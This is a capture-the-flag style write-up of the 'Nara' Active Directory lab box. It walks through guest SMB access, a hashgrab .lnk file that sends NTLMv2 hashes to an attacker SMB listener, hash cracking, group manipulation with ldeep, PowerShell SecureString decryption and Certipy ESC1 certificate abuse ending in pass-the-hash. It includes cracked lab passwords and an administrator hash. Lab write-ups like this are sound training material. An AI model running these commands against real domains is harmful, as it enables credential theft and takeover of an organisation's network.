Skip to content

Nara -- Proving Grounds (write-up)

Difficulty: Hard Box: Nara (Proving Grounds) Author: dsec Date: 2025-11-27


TL;DR

AD box. Guest SMB access led to hashgrab via malicious .lnk file. Cracked Tracy.White's NTLMv2 hash, used ldeep to add her to Remote Access group. Found encrypted cred file, decrypted for Jodie.Summers. Certipy found ESC1/ESC4 but the box appeared broken during exploitation.


Target info

  • Host: 192.168.190.30
  • Domain: nara-security.com / NARASEC

Enumeration

sudo nmap -Pn -n 192.168.190.30 -sCV -p- --open -vvv

Nmap results

SMB enumeration

LDAP enumeration

Domain info

Share listing

User access

Used nxc to enumerate users:

NXC user enum

User list

Found users including Tracy.White, Jodie.Summers, Damian.Johnson, Helen.Robinson, and others.

Share access

Further SMB

Tried usernames as passwords and lowercase variants -- nothing worked.


Initial foothold -- hashgrab

Created a malicious .lnk file with hashgrab:

python3 hashgrab.py 192.168.45.208 test

Hashgrab

Started an SMB listener:

smbserver.py smb share/ -smb2support

Connected as guest and uploaded test.lnk to the Nara share /Documents:

smbclient.py narasec/guest:''@192.168.195.30

Upload lnk

Captured Tracy.White's NTLMv2 hash:

Hash captured

Cracked it:

Cracked hash

Creds: tracy.white:zqwj041FGX


Lateral movement

Used ldeep to add Tracy.White to the Remote Access group:

ldeep ldap -u tracy.white -p 'zqwj041FGX' -d nara-security.com -s ldap://nara-security.com add_to_group "CN=TRACY WHITE,OU=STAFF,DC=NARA-SECURITY,DC=COM" "CN=REMOTE ACCESS,OU=remote,DC=NARA-SECURITY,DC=COM"

Group added

Got a shell:

Shell as tracy

Found an encrypted credential file. Decrypted it with PowerShell:

$pw = Get-Content cred.txt | ConvertTo-SecureString
$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($pw)
$UnsecurePassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr)
$UnsecurePassword

Password: hHO_S9gff7ehXw

Decrypted cred

Jodie access

Creds: jodie.summers:hHO_S9gff7ehXw

Evil-winrm showed same privileges on the same machine.


AD enumeration

Ran dnschef + bloodhound-python:

Bloodhound

Attack paths

Both users showed DCSync attack paths but the details were vague.


Privesc attempt -- Certipy (ESC1/ESC4)

certipy find -dc-ip 192.168.195.30 -ns 192.168.195.30 -u jodie.summers@nara-security.com -p 'hHO_S9gff7ehXw'

Certipy scan

Vulnerable templates

Found ESC1 and ESC4 vulnerabilities on the NARAUSER template.

Box appeared broken during exploitation. Checked every walkthrough available and even copy-pasted from the official walkthrough. The certipy request kept failing.

certipy-ad req -username JODIE.SUMMERS -password 'hHO_S9gff7ehXw' -target nara-security.com -ca NARA-CA -template NARAUSER -upn administrator@nara-security.com -dc-ip 172.16.201.26 -debug

Error

After rebooting the box and VM, got the same error as a video walkthrough (where the author had to re-run multiple times until it worked).

Expected result:

Expected output

Final commands (when working):

certipy auth -pfx administrator.pfx -domain nara-security.com -username administrator -dc-ip 172.16.201.26
evil-winrm -u administrator -i nara-security.com -H d35c4ae45bdd10a4e28ff529a2155745

Lessons & takeaways

  • Malicious .lnk files via hashgrab are effective for capturing NTLMv2 hashes from file shares
  • PowerShell ConvertTo-SecureString creds can be reversed if you have access to the same machine/user context
  • ESC1/ESC4 certificate abuse is powerful but can be finicky -- sometimes boxes need resets